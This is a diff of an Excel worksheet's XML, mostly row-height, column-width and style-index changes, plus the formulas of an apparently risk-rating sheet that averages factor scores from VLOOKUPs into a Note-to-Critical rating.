       <c r="B91" s="7"/>
       <c r="C91" s="43"/>
       <c r="D91" s="45"/>
       <c r="E91" s="23"/>
     </row>
-    <row r="92" spans="1:6" s="29" customFormat="1" x14ac:dyDescent="0.15">
+    <row r="92" spans="1:6" s="29" customFormat="1" x14ac:dyDescent="0.2">
       <c r="A92" s="26" t="s">
         <v>264</v>
       </c>
@@ -5589,7 +5573,7 @@
         <v>124</v>
       </c>
     </row>
-    <row r="93" spans="1:6" s="20" customFormat="1" ht="36" x14ac:dyDescent="0.15">
+    <row r="93" spans="1:6" s="20" customFormat="1" ht="36" x14ac:dyDescent="0.2">
       <c r="A93" s="20" t="s">
         <v>267</v>
       </c>
@@ -5607,7 +5591,7 @@
       </c>
       <c r="F93" s="29"/>
     </row>
-    <row r="94" spans="1:6" s="20" customFormat="1" ht="62.25" customHeight="1" x14ac:dyDescent="0.15">
+    <row r="94" spans="1:6" s="20" customFormat="1" ht="62.25" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A94" s="20" t="s">
         <v>268</v>
       </c>
@@ -5625,14 +5609,14 @@
       </c>
       <c r="F94" s="29"/>
     </row>
-    <row r="95" spans="1:6" s="20" customFormat="1" x14ac:dyDescent="0.15">
+    <row r="95" spans="1:6" s="20" customFormat="1" x14ac:dyDescent="0.2">
       <c r="B95" s="7"/>
       <c r="C95" s="41"/>
       <c r="D95" s="44"/>
       <c r="E95" s="21"/>
       <c r="F95" s="29"/>
     </row>
-    <row r="96" spans="1:6" s="20" customFormat="1" x14ac:dyDescent="0.15">
+    <row r="96" spans="1:6" s="20" customFormat="1" x14ac:dyDescent="0.2">
       <c r="A96" s="26" t="s">
         <v>269</v>
       </c>
@@ -5652,7 +5636,7 @@
         <v>124</v>
       </c>
     </row>
-    <row r="97" spans="1:6" ht="26" x14ac:dyDescent="0.15">
+    <row r="97" spans="1:6" ht="25.5" x14ac:dyDescent="0.2">
       <c r="A97" s="20" t="s">
         <v>273</v>
       </c>
@@ -5670,7 +5654,7 @@
       </c>
       <c r="F97" s="29"/>
     </row>
-    <row r="98" spans="1:6" ht="61.5" customHeight="1" x14ac:dyDescent="0.15">
+    <row r="98" spans="1:6" ht="61.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A98" s="20" t="s">
         <v>274</v>
       </c>
@@ -5688,7 +5672,7 @@
       </c>
       <c r="F98" s="29"/>
     </row>
-    <row r="99" spans="1:6" ht="60" x14ac:dyDescent="0.15">
+    <row r="99" spans="1:6" ht="84" x14ac:dyDescent="0.2">
       <c r="A99" s="20" t="s">
         <v>275</v>
       </c>
@@ -5706,13 +5690,13 @@
       </c>
       <c r="F99" s="29"/>
     </row>
-    <row r="100" spans="1:6" x14ac:dyDescent="0.15">
+    <row r="100" spans="1:6" x14ac:dyDescent="0.2">
       <c r="C100" s="43"/>
       <c r="D100" s="45"/>
       <c r="E100" s="23"/>
       <c r="F100" s="29"/>
     </row>
-    <row r="101" spans="1:6" x14ac:dyDescent="0.15">
+    <row r="101" spans="1:6" ht="25.5" x14ac:dyDescent="0.2">
       <c r="A101" s="26" t="s">
         <v>276</v>
       </c>
@@ -5732,7 +5716,7 @@
         <v>124</v>
       </c>
     </row>
-    <row r="102" spans="1:6" ht="24" x14ac:dyDescent="0.15">
+    <row r="102" spans="1:6" ht="48" x14ac:dyDescent="0.2">
       <c r="A102" s="20" t="s">
         <v>277</v>
       </c>
@@ -5749,7 +5733,7 @@
         <v>123</v>
       </c>
     </row>
-    <row r="103" spans="1:6" ht="48.75" customHeight="1" x14ac:dyDescent="0.15">
+    <row r="103" spans="1:6" ht="48.75" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A103" s="20" t="s">
         <v>278</v>
       </c>
@@ -5766,7 +5750,7 @@
         <v>123</v>
       </c>
     </row>
-    <row r="104" spans="1:6" ht="108" x14ac:dyDescent="0.15">
+    <row r="104" spans="1:6" ht="144" x14ac:dyDescent="0.2">
       <c r="A104" s="20" t="s">
         <v>279</v>
       </c>
@@ -5784,7 +5768,7 @@
       </c>
       <c r="F104" s="20"/>
     </row>
-    <row r="105" spans="1:6" ht="84" x14ac:dyDescent="0.15">
+    <row r="105" spans="1:6" ht="84" x14ac:dyDescent="0.2">
       <c r="A105" s="20" t="s">
         <v>280</v>
       </c>
@@ -5802,7 +5786,7 @@
       </c>
       <c r="F105" s="20"/>
     </row>
-    <row r="106" spans="1:6" ht="84" x14ac:dyDescent="0.15">
+    <row r="106" spans="1:6" ht="84" x14ac:dyDescent="0.2">
       <c r="A106" s="20" t="s">
         <v>281</v>
       </c>
@@ -5820,7 +5804,7 @@
       </c>
       <c r="F106" s="20"/>
     </row>
-    <row r="107" spans="1:6" ht="48" x14ac:dyDescent="0.15">
+    <row r="107" spans="1:6" ht="72" x14ac:dyDescent="0.2">
       <c r="A107" s="20" t="s">
         <v>282</v>
       </c>
@@ -5838,7 +5822,7 @@
       </c>
       <c r="F107" s="20"/>
     </row>
-    <row r="108" spans="1:6" ht="48" x14ac:dyDescent="0.15">
+    <row r="108" spans="1:6" ht="60" x14ac:dyDescent="0.2">
       <c r="A108" s="20" t="s">
         <v>283</v>
       </c>
@@ -5856,7 +5840,7 @@
       </c>
       <c r="F108" s="20"/>
     </row>
-    <row r="109" spans="1:6" ht="72" x14ac:dyDescent="0.15">
+    <row r="109" spans="1:6" ht="96" x14ac:dyDescent="0.2">
       <c r="A109" s="20" t="s">
         <v>284</v>
       </c>
@@ -5874,7 +5858,7 @@
       </c>
       <c r="F109" s="20"/>
     </row>
-    <row r="110" spans="1:6" ht="60" x14ac:dyDescent="0.15">
+    <row r="110" spans="1:6" ht="60" x14ac:dyDescent="0.2">
       <c r="A110" s="20" t="s">
         <v>285</v>
       </c>
@@ -5892,7 +5876,7 @@
       </c>
       <c r="F110" s="20"/>
     </row>
-    <row r="111" spans="1:6" s="29" customFormat="1" x14ac:dyDescent="0.15">
+    <row r="111" spans="1:6" s="29" customFormat="1" x14ac:dyDescent="0.2">
       <c r="A111" s="20"/>
       <c r="B111" s="7"/>
       <c r="C111" s="41"/>
@@ -5900,7 +5884,7 @@
       <c r="E111" s="21"/>
       <c r="F111" s="20"/>
     </row>
-    <row r="112" spans="1:6" x14ac:dyDescent="0.15">
+    <row r="112" spans="1:6" x14ac:dyDescent="0.2">
       <c r="A112" s="26" t="s">
         <v>295</v>
       </c>
@@ -5920,7 +5904,7 @@
         <v>124</v>
       </c>
     </row>
-    <row r="113" spans="1:6" ht="17.25" customHeight="1" x14ac:dyDescent="0.15">
+    <row r="113" spans="1:6" ht="17.25" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A113" s="20" t="s">
         <v>296</v>
       </c>
@@ -5938,7 +5922,7 @@
       </c>
       <c r="F113" s="29"/>
     </row>
-    <row r="114" spans="1:6" ht="24" x14ac:dyDescent="0.15">
+    <row r="114" spans="1:6" ht="24" x14ac:dyDescent="0.2">
       <c r="A114" s="20" t="s">
         <v>297</v>
       </c>
@@ -5956,7 +5940,7 @@
       </c>
       <c r="F114" s="29"/>
     </row>
-    <row r="115" spans="1:6" ht="24" x14ac:dyDescent="0.15">
+    <row r="115" spans="1:6" ht="24" x14ac:dyDescent="0.2">
       <c r="A115" s="20" t="s">
         <v>298</v>
       </c>
@@ -5974,7 +5958,7 @@
       </c>
       <c r="F115" s="20"/>
     </row>
-    <row r="116" spans="1:6" ht="24" x14ac:dyDescent="0.15">
+    <row r="116" spans="1:6" ht="24" x14ac:dyDescent="0.2">
       <c r="A116" s="20" t="s">
         <v>299</v>
       </c>
@@ -5992,7 +5976,7 @@
       </c>
       <c r="F116" s="20"/>
     </row>
-    <row r="117" spans="1:6" ht="48" x14ac:dyDescent="0.15">
+    <row r="117" spans="1:6" ht="48" x14ac:dyDescent="0.2">
       <c r="A117" s="20" t="s">
         <v>300</v>
       </c>
@@ -6010,7 +5994,7 @@
       </c>
       <c r="F117" s="20"/>
     </row>
-    <row r="118" spans="1:6" ht="24" customHeight="1" x14ac:dyDescent="0.15">
+    <row r="118" spans="1:6" ht="24" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A118" s="20" t="s">
         <v>301</v>
       </c>
@@ -6028,7 +6012,7 @@
       </c>
       <c r="F118" s="20"/>
     </row>
-    <row r="119" spans="1:6" ht="24" x14ac:dyDescent="0.15">
+    <row r="119" spans="1:6" ht="24" x14ac:dyDescent="0.2">
       <c r="A119" s="20" t="s">
         <v>302</v>
       </c>
@@ -6046,7 +6030,7 @@
       </c>
       <c r="F119" s="20"/>
     </row>
-    <row r="120" spans="1:6" ht="26" x14ac:dyDescent="0.15">
+    <row r="120" spans="1:6" ht="25.5" x14ac:dyDescent="0.2">
       <c r="A120" s="20" t="s">
         <v>303</v>
       </c>
@@ -6064,7 +6048,7 @@
       </c>
       <c r="F120" s="20"/>
     </row>
-    <row r="121" spans="1:6" ht="25.5" customHeight="1" x14ac:dyDescent="0.15">
+    <row r="121" spans="1:6" ht="25.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A121" s="20" t="s">
         <v>304</v>
       </c>
@@ -6082,7 +6066,7 @@
       </c>
       <c r="F121" s="20"/>
     </row>
-    <row r="122" spans="1:6" ht="48" x14ac:dyDescent="0.15">
+    <row r="122" spans="1:6" ht="60" x14ac:dyDescent="0.2">
       <c r="A122" s="20" t="s">
         <v>305</v>
       </c>
@@ -6099,7 +6083,7 @@
         <v>123</v>
       </c>
     </row>
-    <row r="123" spans="1:6" ht="36" x14ac:dyDescent="0.15">
+    <row r="123" spans="1:6" ht="48" x14ac:dyDescent="0.2">
       <c r="A123" s="20" t="s">
         <v>306</v>
       </c>
@@ -6117,7 +6101,7 @@
       </c>
       <c r="F123" s="29"/>
     </row>
-    <row r="124" spans="1:6" ht="36" x14ac:dyDescent="0.15">
+    <row r="124" spans="1:6" ht="36" x14ac:dyDescent="0.2">
       <c r="A124" s="20" t="s">
         <v>307</v>
       </c>
@@ -6135,36 +6119,36 @@
       </c>
       <c r="F124" s="29"/>
     </row>
-    <row r="125" spans="1:6" s="29" customFormat="1" x14ac:dyDescent="0.15">
+    <row r="125" spans="1:6" s="29" customFormat="1" x14ac:dyDescent="0.2">
       <c r="A125" s="20"/>
       <c r="B125" s="7"/>
       <c r="C125" s="41"/>
       <c r="D125" s="44"/>
       <c r="E125" s="21"/>
     </row>
-    <row r="126" spans="1:6" s="29" customFormat="1" x14ac:dyDescent="0.15">
+    <row r="126" spans="1:6" s="29" customFormat="1" x14ac:dyDescent="0.2">
       <c r="A126" s="37"/>
       <c r="B126" s="7"/>
       <c r="C126" s="41"/>
       <c r="D126" s="44"/>
       <c r="E126" s="21"/>
     </row>
-    <row r="127" spans="1:6" x14ac:dyDescent="0.15">
+    <row r="127" spans="1:6" x14ac:dyDescent="0.2">
       <c r="A127" s="25" t="s">
         <v>123</v>
       </c>
     </row>
-    <row r="128" spans="1:6" x14ac:dyDescent="0.15">
+    <row r="128" spans="1:6" x14ac:dyDescent="0.2">
       <c r="A128" s="25" t="s">
         <v>115</v>
       </c>
     </row>
-    <row r="129" spans="1:1" x14ac:dyDescent="0.15">
+    <row r="129" spans="1:1" x14ac:dyDescent="0.2">
       <c r="A129" s="25" t="s">
         <v>116</v>
       </c>
     </row>
-    <row r="130" spans="1:1" x14ac:dyDescent="0.15">
+    <row r="130" spans="1:1" x14ac:dyDescent="0.2">
       <c r="A130" s="25" t="s">
         <v>7</v>
       </c>
@@ -6730,21 +6714,21 @@
       <selection activeCell="J3" sqref="J3"/>
     </sheetView>
   </sheetViews>
-  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="13" x14ac:dyDescent="0.15"/>
+  <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="12.75" x14ac:dyDescent="0.2"/>
   <cols>
-    <col min="1" max="1" width="4.5" bestFit="1" customWidth="1"/>
-    <col min="2" max="2" width="19.6640625" customWidth="1"/>
-    <col min="3" max="3" width="15.6640625" style="29" bestFit="1" customWidth="1"/>
-    <col min="4" max="4" width="17.6640625" customWidth="1"/>
-    <col min="5" max="5" width="8.6640625" bestFit="1" customWidth="1"/>
-    <col min="6" max="6" width="10.33203125" bestFit="1" customWidth="1"/>
-    <col min="7" max="7" width="8.6640625" bestFit="1" customWidth="1"/>
-    <col min="8" max="8" width="23.1640625" bestFit="1" customWidth="1"/>
-    <col min="9" max="9" width="16.83203125" bestFit="1" customWidth="1"/>
+    <col min="1" max="1" width="4.42578125" bestFit="1" customWidth="1"/>
+    <col min="2" max="2" width="19.7109375" customWidth="1"/>
+    <col min="3" max="3" width="15.7109375" style="29" bestFit="1" customWidth="1"/>
+    <col min="4" max="4" width="17.7109375" customWidth="1"/>
+    <col min="5" max="5" width="8.7109375" bestFit="1" customWidth="1"/>
+    <col min="6" max="6" width="10.28515625" bestFit="1" customWidth="1"/>
+    <col min="7" max="7" width="8.7109375" bestFit="1" customWidth="1"/>
+    <col min="8" max="8" width="23.140625" bestFit="1" customWidth="1"/>
+    <col min="9" max="9" width="16.85546875" bestFit="1" customWidth="1"/>
     <col min="10" max="10" width="9" bestFit="1" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:10" ht="30" x14ac:dyDescent="0.15">
+    <row r="1" spans="1:10" ht="30" x14ac:dyDescent="0.2">
       <c r="A1" s="33" t="s">
         <v>334</v>
       </c>
@@ -6776,7 +6760,7 @@
         <v>341</v>
       </c>
     </row>
-    <row r="2" spans="1:10" ht="26" x14ac:dyDescent="0.15">
+    <row r="2" spans="1:10" ht="25.5" x14ac:dyDescent="0.2">
       <c r="A2" s="30">
         <v>1</v>
       </c>
@@ -6804,7 +6788,7 @@
         <v>342</v>
       </c>
     </row>
-    <row r="3" spans="1:10" x14ac:dyDescent="0.15">
+    <row r="3" spans="1:10" x14ac:dyDescent="0.2">
       <c r="A3" s="34"/>
       <c r="B3" s="34"/>
       <c r="C3" s="34"/>
@@ -6815,7 +6799,7 @@
       <c r="H3" s="34"/>
       <c r="I3" s="34"/>
     </row>
-    <row r="4" spans="1:10" x14ac:dyDescent="0.15">
+    <row r="4" spans="1:10" x14ac:dyDescent="0.2">
       <c r="A4" s="34"/>
       <c r="B4" s="34"/>
       <c r="C4" s="34"/>
@@ -6852,44 +6836,44 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A1:J26"/>
   <sheetViews>
-    <sheetView topLeftCell="A4" workbookViewId="0">
-      <selection activeCell="B13" sqref="B13:D13"/>
+    <sheetView tabSelected="1" topLeftCell="A4" workbookViewId="0">
+      <selection activeCell="E8" sqref="E8"/>
     </sheetView>
   </sheetViews>
-  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="13" x14ac:dyDescent="0.15"/>
+  <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="12.75" x14ac:dyDescent="0.2"/>
   <cols>
-    <col min="1" max="1" width="18.5" bestFit="1" customWidth="1"/>
-    <col min="2" max="4" width="14.6640625" customWidth="1"/>
-    <col min="5" max="5" width="3.6640625" customWidth="1"/>
-    <col min="6" max="6" width="20.6640625" bestFit="1" customWidth="1"/>
-    <col min="7" max="7" width="42.6640625" customWidth="1"/>
-    <col min="8" max="8" width="3.6640625" customWidth="1"/>
-    <col min="10" max="10" width="40.5" bestFit="1" customWidth="1"/>
+    <col min="1" max="1" width="18.42578125" bestFit="1" customWidth="1"/>
+    <col min="2" max="4" width="14.7109375" customWidth="1"/>
+    <col min="5" max="5" width="5.5703125" bestFit="1" customWidth="1"/>
+    <col min="6" max="6" width="20.7109375" bestFit="1" customWidth="1"/>
+    <col min="7" max="7" width="42.7109375" customWidth="1"/>
+    <col min="8" max="8" width="3.7109375" customWidth="1"/>
+    <col min="10" max="10" width="40.42578125" bestFit="1" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:10" ht="21" x14ac:dyDescent="0.25">
-      <c r="A1" s="58" t="s">
+    <row r="1" spans="1:10" ht="21" x14ac:dyDescent="0.35">
+      <c r="A1" s="54" t="s">
         <v>8</v>
       </c>
-      <c r="B1" s="58"/>
-      <c r="C1" s="58"/>
-      <c r="D1" s="58"/>
-      <c r="E1" s="58"/>
-      <c r="F1" s="58"/>
-      <c r="G1" s="58"/>
-    </row>
-    <row r="3" spans="1:10" ht="15" x14ac:dyDescent="0.15">
-      <c r="A3" s="59" t="s">
+      <c r="B1" s="54"/>
+      <c r="C1" s="54"/>
+      <c r="D1" s="54"/>
+      <c r="E1" s="54"/>
+      <c r="F1" s="54"/>
+      <c r="G1" s="54"/>
+    </row>
+    <row r="3" spans="1:10" ht="15" x14ac:dyDescent="0.2">
+      <c r="A3" s="55" t="s">
         <v>9</v>
       </c>
-      <c r="B3" s="59"/>
-      <c r="C3" s="59"/>
-      <c r="D3" s="59"/>
+      <c r="B3" s="55"/>
+      <c r="C3" s="55"/>
+      <c r="D3" s="55"/>
       <c r="E3" s="2"/>
-      <c r="F3" s="59" t="s">
+      <c r="F3" s="55" t="s">
         <v>10</v>
       </c>
-      <c r="G3" s="59"/>
+      <c r="G3" s="55"/>
       <c r="I3" t="s">
         <v>11</v>
       </c>
@@ -6897,28 +6881,28 @@
         <v>12</v>
       </c>
     </row>
-    <row r="4" spans="1:10" ht="15" x14ac:dyDescent="0.15">
-      <c r="A4" s="60" t="s">
+    <row r="4" spans="1:10" ht="15" x14ac:dyDescent="0.2">
+      <c r="A4" s="56" t="s">
         <v>13</v>
       </c>
-      <c r="B4" s="60"/>
-      <c r="C4" s="60"/>
-      <c r="D4" s="60"/>
+      <c r="B4" s="56"/>
+      <c r="C4" s="56"/>
+      <c r="D4" s="56"/>
       <c r="E4" s="3"/>
-      <c r="F4" s="60" t="s">
+      <c r="F4" s="56" t="s">
         <v>14</v>
       </c>
-      <c r="G4" s="60"/>
-    </row>
-    <row r="5" spans="1:10" ht="15" x14ac:dyDescent="0.2">
+      <c r="G4" s="56"/>
+    </row>
+    <row r="5" spans="1:10" ht="15" x14ac:dyDescent="0.25">
       <c r="A5" s="4" t="s">
         <v>15</v>
       </c>
-      <c r="B5" s="55" t="s">
+      <c r="B5" s="51" t="s">
         <v>61</v>
       </c>
-      <c r="C5" s="56"/>
-      <c r="D5" s="56"/>
+      <c r="C5" s="52"/>
+      <c r="D5" s="52"/>
       <c r="E5" s="5">
         <f>VLOOKUP(B5,References!A2:B8,2,FALSE)</f>
         <v>3</v>
@@ -6934,15 +6918,15 @@
         <v>2</v>
       </c>
     </row>
-    <row r="6" spans="1:10" ht="15" x14ac:dyDescent="0.2">
+    <row r="6" spans="1:10" ht="15" x14ac:dyDescent="0.25">
       <c r="A6" s="4" t="s">
         <v>19</v>
       </c>
-      <c r="B6" s="63" t="s">
+      <c r="B6" s="59" t="s">
         <v>62</v>
       </c>
-      <c r="C6" s="63"/>
-      <c r="D6" s="63"/>
+      <c r="C6" s="59"/>
+      <c r="D6" s="59"/>
       <c r="E6" s="5">
         <f>VLOOKUP(B6,References!C2:D6,2,FALSE)</f>
         <v>4</v>
@@ -6958,15 +6942,15 @@
         <v>3</v>
       </c>
     </row>
-    <row r="7" spans="1:10" ht="15" x14ac:dyDescent="0.2">
+    <row r="7" spans="1:10" ht="15" x14ac:dyDescent="0.25">
       <c r="A7" s="4" t="s">
         <v>23</v>
       </c>
-      <c r="B7" s="63" t="s">
+      <c r="B7" s="59" t="s">
         <v>56</v>
       </c>
-      <c r="C7" s="63"/>
-      <c r="D7" s="63"/>
+      <c r="C7" s="59"/>
+      <c r="D7" s="59"/>
       <c r="E7" s="5">
         <f>VLOOKUP(B7,References!E2:F6,2,FALSE)</f>
         <v>0</v>
@@ -6982,17 +6966,17 @@
         <v>1</v>
       </c>
     </row>
-    <row r="8" spans="1:10" ht="15" x14ac:dyDescent="0.2">
+    <row r="8" spans="1:10" ht="15" x14ac:dyDescent="0.25">
       <c r="A8" s="4" t="s">
         <v>27</v>
       </c>
-      <c r="B8" s="63" t="s">
+      <c r="B8" s="59" t="s">
         <v>28</v>
       </c>
-      <c r="C8" s="63"/>
-      <c r="D8" s="63"/>
+      <c r="C8" s="59"/>
+      <c r="D8" s="59"/>
       <c r="E8" s="5">
-        <f>VLOOKUP(B8,[1]Sheet3!G2:H8,2,FALSE)</f>
+        <f>VLOOKUP(B8,References!G3:H8,2,FALSE)</f>
         <v>2</v>
       </c>
       <c r="F8" s="4" t="s">
@@ -7006,7 +6990,7 @@
         <v>0</v>
       </c>
     </row>
-    <row r="9" spans="1:10" ht="15" x14ac:dyDescent="0.2">
+    <row r="9" spans="1:10" ht="15" x14ac:dyDescent="0.25">
       <c r="A9" s="4"/>
       <c r="B9" s="8"/>
       <c r="C9" s="8"/>
@@ -7016,29 +7000,29 @@
       <c r="G9" s="8"/>
       <c r="H9" s="7"/>
     </row>
-    <row r="10" spans="1:10" ht="15" x14ac:dyDescent="0.15">
-      <c r="A10" s="60" t="s">
+    <row r="10" spans="1:10" ht="15" x14ac:dyDescent="0.2">
+      <c r="A10" s="56" t="s">
         <v>31</v>
       </c>
-      <c r="B10" s="60"/>
-      <c r="C10" s="60"/>
-      <c r="D10" s="60"/>
+      <c r="B10" s="56"/>
+      <c r="C10" s="56"/>
+      <c r="D10" s="56"/>
       <c r="E10" s="3"/>
-      <c r="F10" s="60" t="s">
+      <c r="F10" s="56" t="s">
         <v>32</v>
       </c>
-      <c r="G10" s="60"/>
+      <c r="G10" s="56"/>
       <c r="H10" s="3"/>
     </row>
-    <row r="11" spans="1:10" ht="15" x14ac:dyDescent="0.2">
+    <row r="11" spans="1:10" ht="15" x14ac:dyDescent="0.25">
       <c r="A11" s="4" t="s">
         <v>33</v>
       </c>
-      <c r="B11" s="54" t="s">
+      <c r="B11" s="60" t="s">
         <v>59</v>
       </c>
-      <c r="C11" s="54"/>
-      <c r="D11" s="54"/>
+      <c r="C11" s="60"/>
+      <c r="D11" s="60"/>
       <c r="E11" s="5">
         <f>VLOOKUP(B11,References!I2:J7,2,FALSE)</f>
         <v>1</v>
@@ -7054,15 +7038,15 @@
         <v>3</v>
       </c>
     </row>
-    <row r="12" spans="1:10" ht="15" x14ac:dyDescent="0.2">
+    <row r="12" spans="1:10" ht="15" x14ac:dyDescent="0.25">
       <c r="A12" s="4" t="s">
         <v>37</v>
       </c>
-      <c r="B12" s="54" t="s">
+      <c r="B12" s="60" t="s">
         <v>70</v>
       </c>
-      <c r="C12" s="54"/>
-      <c r="D12" s="54"/>
+      <c r="C12" s="60"/>
+      <c r="D12" s="60"/>
       <c r="E12" s="5">
         <f>VLOOKUP(B12,References!K$2:L$7,2,FALSE)</f>
         <v>5</v>
@@ -7078,15 +7062,15 @@
         <v>4</v>
       </c>
     </row>
-    <row r="13" spans="1:10" ht="15" x14ac:dyDescent="0.2">
+    <row r="13" spans="1:10" ht="15" x14ac:dyDescent="0.25">
       <c r="A13" s="4" t="s">
         <v>40</v>
       </c>
-      <c r="B13" s="54" t="s">
+      <c r="B13" s="60" t="s">
         <v>64</v>
       </c>
-      <c r="C13" s="54"/>
-      <c r="D13" s="54"/>
+      <c r="C13" s="60"/>
+      <c r="D13" s="60"/>
       <c r="E13" s="5">
         <f>VLOOKUP(B13,References!M$2:N$7,2,FALSE)</f>
         <v>4</v>
@@ -7102,15 +7086,15 @@
         <v>5</v>
       </c>
     </row>
-    <row r="14" spans="1:10" ht="15" x14ac:dyDescent="0.2">
+    <row r="14" spans="1:10" ht="15" x14ac:dyDescent="0.25">
       <c r="A14" s="4" t="s">
         <v>44</v>
       </c>
-      <c r="B14" s="54" t="s">
+      <c r="B14" s="60" t="s">
         <v>65</v>
       </c>
-      <c r="C14" s="54"/>
-      <c r="D14" s="54"/>
+      <c r="C14" s="60"/>
+      <c r="D14" s="60"/>
       <c r="E14" s="5">
         <f>VLOOKUP(B14,References!O$2:P$7,2,FALSE)</f>
         <v>3</v>
@@ -7126,57 +7110,57 @@
         <v>3</v>
       </c>
     </row>
-    <row r="15" spans="1:10" ht="15" x14ac:dyDescent="0.2">
+    <row r="15" spans="1:10" ht="15" x14ac:dyDescent="0.25">
       <c r="E15" s="4"/>
     </row>
-    <row r="16" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="A16" s="61" t="s">
+    <row r="16" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.25">
+      <c r="A16" s="57" t="s">
         <v>48</v>
       </c>
-      <c r="B16" s="57">
+      <c r="B16" s="53">
         <f>IFERROR(AVERAGE(E5:E8,E11:E14),"All factors require a selection.")</f>
         <v>2.75</v>
       </c>
-      <c r="C16" s="57"/>
-      <c r="D16" s="57"/>
+      <c r="C16" s="53"/>
+      <c r="D16" s="53"/>
       <c r="E16" s="4"/>
-      <c r="F16" s="62" t="s">
+      <c r="F16" s="58" t="s">
         <v>49</v>
       </c>
-      <c r="G16" s="57">
+      <c r="G16" s="53">
         <f>IFERROR(AVERAGE(H5:H8,H11:H14),"All factors require a selection.")</f>
         <v>2.625</v>
       </c>
     </row>
-    <row r="17" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.15">
-      <c r="A17" s="61"/>
-      <c r="B17" s="57"/>
-      <c r="C17" s="57"/>
-      <c r="D17" s="57"/>
-      <c r="F17" s="62"/>
-      <c r="G17" s="57"/>
-    </row>
-    <row r="20" spans="1:7" ht="19" x14ac:dyDescent="0.25">
-      <c r="B20" s="51" t="s">
+    <row r="17" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="A17" s="57"/>
+      <c r="B17" s="53"/>
+      <c r="C17" s="53"/>
+      <c r="D17" s="53"/>
+      <c r="F17" s="58"/>
+      <c r="G17" s="53"/>
+    </row>
+    <row r="20" spans="1:7" ht="18.75" x14ac:dyDescent="0.3">
+      <c r="B20" s="61" t="s">
         <v>50</v>
       </c>
-      <c r="C20" s="51"/>
-      <c r="D20" s="51"/>
-      <c r="E20" s="52" t="str">
+      <c r="C20" s="61"/>
+      <c r="D20" s="61"/>
+      <c r="E20" s="62" t="str">
         <f>IFERROR(IF(AND($B$16&lt;3,$G$16&lt;3),"Note",IF(OR(AND($B$16&lt;3,$G$16&gt;=3,$G$16&lt;6),AND($B$16&gt;=3,$B$16&lt;6,$G$16&lt;3)),"Low",IF(OR(AND($B16&lt;3,$G16&gt;=6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;=3,$G16&lt;6),AND($B16&gt;=6,$G16&lt;3)),"MODERATE",IF(OR(AND($B16&gt;=6,$B16&gt;=3,$G16&lt;6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;6)),"High","Critical")))),"Note")</f>
         <v>Note</v>
       </c>
-      <c r="F20" s="52"/>
+      <c r="F20" s="62"/>
       <c r="G20" s="1"/>
     </row>
-    <row r="22" spans="1:7" ht="15" x14ac:dyDescent="0.2">
-      <c r="B22" s="53" t="s">
+    <row r="22" spans="1:7" ht="15" x14ac:dyDescent="0.25">
+      <c r="B22" s="63" t="s">
         <v>51</v>
       </c>
-      <c r="C22" s="53"/>
-      <c r="D22" s="53"/>
-    </row>
-    <row r="23" spans="1:7" ht="15" x14ac:dyDescent="0.2">
+      <c r="C22" s="63"/>
+      <c r="D22" s="63"/>
+    </row>
+    <row r="23" spans="1:7" ht="15" x14ac:dyDescent="0.25">
       <c r="A23" s="9" t="s">
         <v>52</v>
       </c>
@@ -7194,7 +7178,7 @@
       </c>
       <c r="F23" s="10"/>
     </row>
-    <row r="24" spans="1:7" x14ac:dyDescent="0.15">
+    <row r="24" spans="1:7" x14ac:dyDescent="0.2">
       <c r="A24" s="11" t="str">
         <f>IF($B16&lt;3,"-&gt;Low&lt;-","Low")</f>
         <v>-&gt;Low&lt;-</v>
@@ -7213,7 +7197,7 @@
       </c>
       <c r="F24" s="15"/>
     </row>
-    <row r="25" spans="1:7" x14ac:dyDescent="0.15">
+    <row r="25" spans="1:7" x14ac:dyDescent="0.2">
       <c r="A25" s="11" t="str">
         <f>IF(AND($B16&gt;=3,$B16&lt;6),"-&gt;Moderate&lt;-","Moderate")</f>
         <v>Moderate</v>
@@ -7232,7 +7216,7 @@
       </c>
       <c r="F25" s="15"/>
     </row>
-    <row r="26" spans="1:7" x14ac:dyDescent="0.15">
+    <row r="26" spans="1:7" x14ac:dyDescent="0.2">
       <c r="A26" s="11" t="str">
         <f>IF($B16&gt;=6,"-&gt;High&lt;-","High")</f>
         <v>High</v>
@@ -7253,6 +7237,12 @@
   </sheetData>
   <dataConsolidate function="varp"/>
   <mergeCells count="22">
+    <mergeCell ref="B20:D20"/>
+    <mergeCell ref="E20:F20"/>
+    <mergeCell ref="B22:D22"/>
+    <mergeCell ref="B12:D12"/>
+    <mergeCell ref="B13:D13"/>
+    <mergeCell ref="B14:D14"/>
     <mergeCell ref="B5:D5"/>
     <mergeCell ref="B16:D17"/>
     <mergeCell ref="G16:G17"/>
@@ -7269,12 +7259,6 @@
     <mergeCell ref="A10:D10"/>
     <mergeCell ref="F10:G10"/>
     <mergeCell ref="B11:D11"/>
-    <mergeCell ref="B20:D20"/>
-    <mergeCell ref="E20:F20"/>
-    <mergeCell ref="B22:D22"/>
-    <mergeCell ref="B12:D12"/>
-    <mergeCell ref="B13:D13"/>
-    <mergeCell ref="B14:D14"/>
   </mergeCells>
   <phoneticPr fontId="5" type="noConversion"/>
